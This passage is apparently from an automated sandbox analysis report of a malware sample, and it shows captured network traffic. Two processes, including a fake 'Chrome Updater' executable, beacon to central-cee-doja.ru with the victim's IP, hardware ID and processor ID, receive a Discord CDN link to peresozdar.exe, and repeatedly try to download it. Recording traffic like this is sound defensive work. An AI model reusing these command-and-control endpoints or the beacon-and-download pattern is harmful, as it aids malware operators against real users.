                                                                                    2024-01-04 07:31:23 UTC211INData Raw: 69 6e 67 3d 27 55 54 46 2d 38 27 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 4e 6f 20 73 75 63 68 20 6f 62 6a 65 63 74 3a 20 64 69 73 63 6f 72 64 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                    Data Ascii: ing='UTF-8'?><Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Details>No such object: discord/attachments/1165051639040843819/1166800645383270420/peresozdar.exe</Details></Error>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    182192.168.2.649907104.21.89.19344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:23 UTC189OUTGET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:24 UTC574INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:24 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Kx%2BC%2BukXBnjJFB0sg1SNtJGR0agxxLpEDWXOnwSJrDxWOxAzaOuc9JSG0VaWQN1KJIoPRBsit34BuKOfNo8Fo9qMiVMgnxoWgjwGGb0lgm9WgiW3GjW2fgcBpAsHdwG0sxKNUnjr"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c818483e5b22-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:24 UTC12INData Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a
                                                                                    Data Ascii: 7UPDATED
                                                                                    2024-01-04 07:31:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    183192.168.2.649908104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:23 UTC189OUTGET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:24 UTC574INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:24 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0asTSjYGxvHb71wqWJAokSMVBsAXUjwHVcXVmDwBD5kaln%2F7EbOCvpfQfejme4MyDO3ieO5fNNybnhqsnZxtPS6PL59URcH95yZ2whLocEhyiFH90M2THE%2F2Pu6HwrljyImG3LyZ"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c81b2c4e3952-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:24 UTC12INData Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a
                                                                                    Data Ascii: 7UPDATED
                                                                                    2024-01-04 07:31:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    184192.168.2.649909104.21.89.19344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:24 UTC62OUTGET //list.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:31:24 UTC595INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:24 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KEawsH4vp8hrp2IRUNE9JFSHB7CckadqIFVKIQ3nlXlqeJIh5MPpvOMFwOpfKix8yVUt%2FjvjC2EOtSicFLbm4Jf9S9H4yDClNy3KIPRsx6RMA1NiHk2YnhdfygpQ6TGjy854ucic"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c81ddc046fc7-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:24 UTC115INData Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a
                                                                                    Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe|4627883NOTASKS
                                                                                    2024-01-04 07:31:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    185192.168.2.649910104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:24 UTC62OUTGET //list.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:31:25 UTC601INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:25 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2Brx6h54c09oouvJ%2B3LD5Cj5cOB30ZWGymoIFvBjrIOYWtbT0qZu6j8q7sbQU%2FEtSjc4taLpy0cELy5xxdYUY65xGl6o2MKcuvXt9zHL2Qxho5n92W2dk3%2FfpMwKsVphfwWG0k9kx"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c820beee3b2f-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:25 UTC115INData Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a
                                                                                    Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe|4627883NOTASKS
                                                                                    2024-01-04 07:31:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    186192.168.2.649911162.159.129.23344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:24 UTC134OUTGET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1
                                                                                    Host: cdn.discordapp.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:25 UTC1340INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 04 Jan 2024 07:31:25 GMT
                                                                                    Content-Type: application/xml; charset=UTF-8
                                                                                    Content-Length: 236
                                                                                    Connection: close
                                                                                    CF-Ray: 8401c821f87d820c-IAD
                                                                                    CF-Cache-Status: HIT
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 58
                                                                                    Cache-Control: public, max-age=31536000
                                                                                    Content-Disposition: attachment
                                                                                    Expires: Fri, 03 Jan 2025 07:31:25 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                    X-GUploader-UploadID: ABPtcPrdbD-6M3VDJwvuVaWMyZIoddmT0kGavFqyZCCeFS3yMb7y1eiW98YXjVseKzj56TszK3GrlYCQLw
                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                    Set-Cookie: __cf_bm=sJEnYvLlXX9k8m3nd7YVY7VyZfkljdyRJslaYfoN.X4-1704353485-1-AU8dTTiS5+n9WYEEVMFjrt22FGjoLfXazIbJpcQ4uwj85Ad6P31TsqDtzyB+dRutcsJ+sv8smvKZ0a+maBtxrxA=; path=/; expires=Thu, 04-Jan-24 08:01:25 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=aR%2BdE9j0QcjBRuly%2BJnXGqT%2BfWNtTw8AIDP83iX2tRxsIQPiVYcXHZApVbA4DmoIBZcyKf8vlFDqvvmFWfoQmnE89ojw3x25deDkrBQSgpO0wFntgMbDXMhxu7i8QU9GuIDyvQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Set-Cookie: _cfuvid=8zMH.TTakzLtGD9JlAc9d6RnBr098aoI6ZiAQyuO0Mo-1704353485151-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    2024-01-04 07:31:25 UTC29INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d
                                                                                    Data Ascii: <?xml version='1.0' encoding=
                                                                                    2024-01-04 07:31:25 UTC207INData Raw: 27 55 54 46 2d 38 27 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 4e 6f 20 73 75 63 68 20 6f 62 6a 65 63 74 3a 20 64 69 73 63 6f 72 64 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                    Data Ascii: 'UTF-8'?><Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Details>No such object: discord/attachments/1165051639040843819/1166800645383270420/peresozdar.exe</Details></Error>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    187192.168.2.649912104.21.89.19344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:25 UTC189OUTGET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:26 UTC578INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:25 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6%2BkZpb%2BwhLmRaPf2KrU8PS0kOYsVK1SmZD4itH5bY5ECmcBoJFCUOavvkf7EytnAeNSfxwWwtx7qOvxa%2F5JnQqC4fBqKnBfPlwXpcnNCZlr2YAIJ5PtAgj%2FyGzFHUi7Q24LENEwn"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c8259f616f9e-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:26 UTC12INData Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a
                                                                                    Data Ascii: 7UPDATED
                                                                                    2024-01-04 07:31:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    188192.168.2.649913162.159.129.2334433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:25 UTC134OUTGET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1
                                                                                    Host: cdn.discordapp.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:25 UTC1336INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 04 Jan 2024 07:31:25 GMT
                                                                                    Content-Type: application/xml; charset=UTF-8
                                                                                    Content-Length: 236
                                                                                    Connection: close
                                                                                    CF-Ray: 8401c82639aa8021-IAD
                                                                                    CF-Cache-Status: HIT
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 47
                                                                                    Cache-Control: public, max-age=31536000
                                                                                    Content-Disposition: attachment
                                                                                    Expires: Fri, 03 Jan 2025 07:31:25 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                    X-GUploader-UploadID: ABPtcPqURQ2RkFvfQOod70WCLX2ErgeFYAiUncDxuJocma8vmDwPeeQBu9xIipew02g4qpq12Sby-B46mw
                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                    Set-Cookie: __cf_bm=OMrrlzHOw8s86gxDueM5cR9CYt8CPWhEgs.PAiXDvak-1704353485-1-ASzx6d+uBUtcBakcv/4GYYC3lUGUISwHP5Mj/RaXbQq4nvggpd/ZQGZ+PoW2Rz8AmzHUaPIHUYmeQNrwlq6CKtE=; path=/; expires=Thu, 04-Jan-24 08:01:25 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lhJaDeo6oETYjwDR9f8g8HxxIfJbMtjfm7opNHvBjOLmJxhhoTfQk94u9TMKopzatIZ3WmZ6i1oUniJS3A9ZT6TFALFXPa11PHBO0gDLxuJt%2BWou3tmSzWv3d48HMcauv9Yl5w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Set-Cookie: _cfuvid=y86yoj8igAusYDI5k4MsfPFxIsZZMXWZpWS6LpCUdoc-1704353485828-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    2024-01-04 07:31:25 UTC33INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d 27 55 54 46
                                                                                    Data Ascii: <?xml version='1.0' encoding='UTF
                                                                                    2024-01-04 07:31:25 UTC203INData Raw: 2d 38 27 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 4e 6f 20 73 75 63 68 20 6f 62 6a 65 63 74 3a 20 64 69 73 63 6f 72 64 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                    Data Ascii: -8'?><Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Details>No such object: discord/attachments/1165051639040843819/1166800645383270420/peresozdar.exe</Details></Error>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    189192.168.2.649914104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:26 UTC165OUTGET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:31:26 UTC584INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:26 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Q8ADGRiJQN93CJOreUaqbg2cI%2FpDKp1uLCGPDAFb%2Bwr5Q4%2B48BK8u%2BfSWkw9pHckeRk%2Fw17tHUZ5lxUw%2FT6jN98xznZOXYbetMCBLfK4Idsa9f%2FLd5aOf3vHiWTnTpfeIQJeSWKU"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c829ccac3b59-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:26 UTC12INData Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a
                                                                                    Data Ascii: 7UPDATED
                                                                                    2024-01-04 07:31:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    190192.168.2.649915104.21.89.19344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:26 UTC62OUTGET //list.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:31:26 UTC597INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:26 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=v4j7tzz8q3Lqd7WevlmbKeQDT8xWh9RMgJSGl9Qx2v21a0zRoIk48T5Q9MfuRZGqTnW10BvY1johsHaIFMmi4ECccb7bAy3S7Xyxwj69IK2xqbndbLfAT3w6NLF5r%2BIOjW0d%2B3W0"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c829fcbe5836-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:26 UTC115INData Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a
                                                                                    Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe|4627883NOTASKS
                                                                                    2024-01-04 07:31:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    191192.168.2.649916104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:26 UTC62OUTGET //list.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:31:27 UTC603INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:27 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=PCGZAju7iPuAVrjElemYo%2BIs%2BMMSRPMlMrmFQkZJyU44ODrYY5Bx%2BzMTbtRWN4RAaej6tpfR3b%2BuOw6FrwSRJIkqlITyHwMtMU60exc4KV4ZsfBPt8hMf8Lz7uWKpBVn%2BwLkHv1G"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c82e2cfe289a-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:27 UTC115INData Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a
                                                                                    Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe|4627883NOTASKS
                                                                                    2024-01-04 07:31:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    192192.168.2.649917162.159.129.23344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:26 UTC134OUTGET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1
                                                                                    Host: cdn.discordapp.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:27 UTC1335INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 04 Jan 2024 07:31:27 GMT
                                                                                    Content-Type: application/xml; charset=UTF-8
                                                                                    Content-Length: 236
                                                                                    Connection: close
                                                                                    CF-Ray: 8401c82e2a151740-IAD
                                                                                    CF-Cache-Status: HIT
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 57
                                                                                    Cache-Control: public, max-age=31536000
                                                                                    Content-Disposition: attachment
                                                                                    Expires: Fri, 03 Jan 2025 07:31:27 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                    X-GUploader-UploadID: ABPtcPqhTB1LXLSJArSkskn7kB2Cz2FEf8U7kttMHLDyayzx2-v-tISfzRDpzXreML572QUvUSs
                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                    Set-Cookie: __cf_bm=GChNIr6.26FLuop4_0mBNhIcX.wIQ72wKmPJ_bjS36k-1704353487-1-AU3s576e24+/1kqONvxZwbS4bHpXQyq+UxVXczSRXkgEFpRRx/fuYrbhbUefmHYSBISooXNoBKRRimjpLGoF62g=; path=/; expires=Thu, 04-Jan-24 08:01:27 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=PKqTjAmrNwavdz2l14tr%2Bt8deUmEFTDiXfGspcHqypWxc7Rvel5rGO5KvCdX2kx9tdbnh48Yh2MwLDKc%2BTrGCSjaMUxOiC5kB7cH1r6uooFNer%2B6fu48Y%2BTBMIPcpOsqYHXzYQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Set-Cookie: _cfuvid=DlMDRbTonB1WrJvjsSCK.k76Lc6khXubDvUxJAdeuto-1704353487102-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    2024-01-04 07:31:27 UTC34INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d 27 55 54 46 2d
                                                                                    Data Ascii: <?xml version='1.0' encoding='UTF-
                                                                                    2024-01-04 07:31:27 UTC202INData Raw: 38 27 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 4e 6f 20 73 75 63 68 20 6f 62 6a 65 63 74 3a 20 64 69 73 63 6f 72 64 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                    Data Ascii: 8'?><Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Details>No such object: discord/attachments/1165051639040843819/1166800645383270420/peresozdar.exe</Details></Error>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    193192.168.2.649918104.21.89.19344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:27 UTC189OUTGET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:27 UTC586INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:27 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
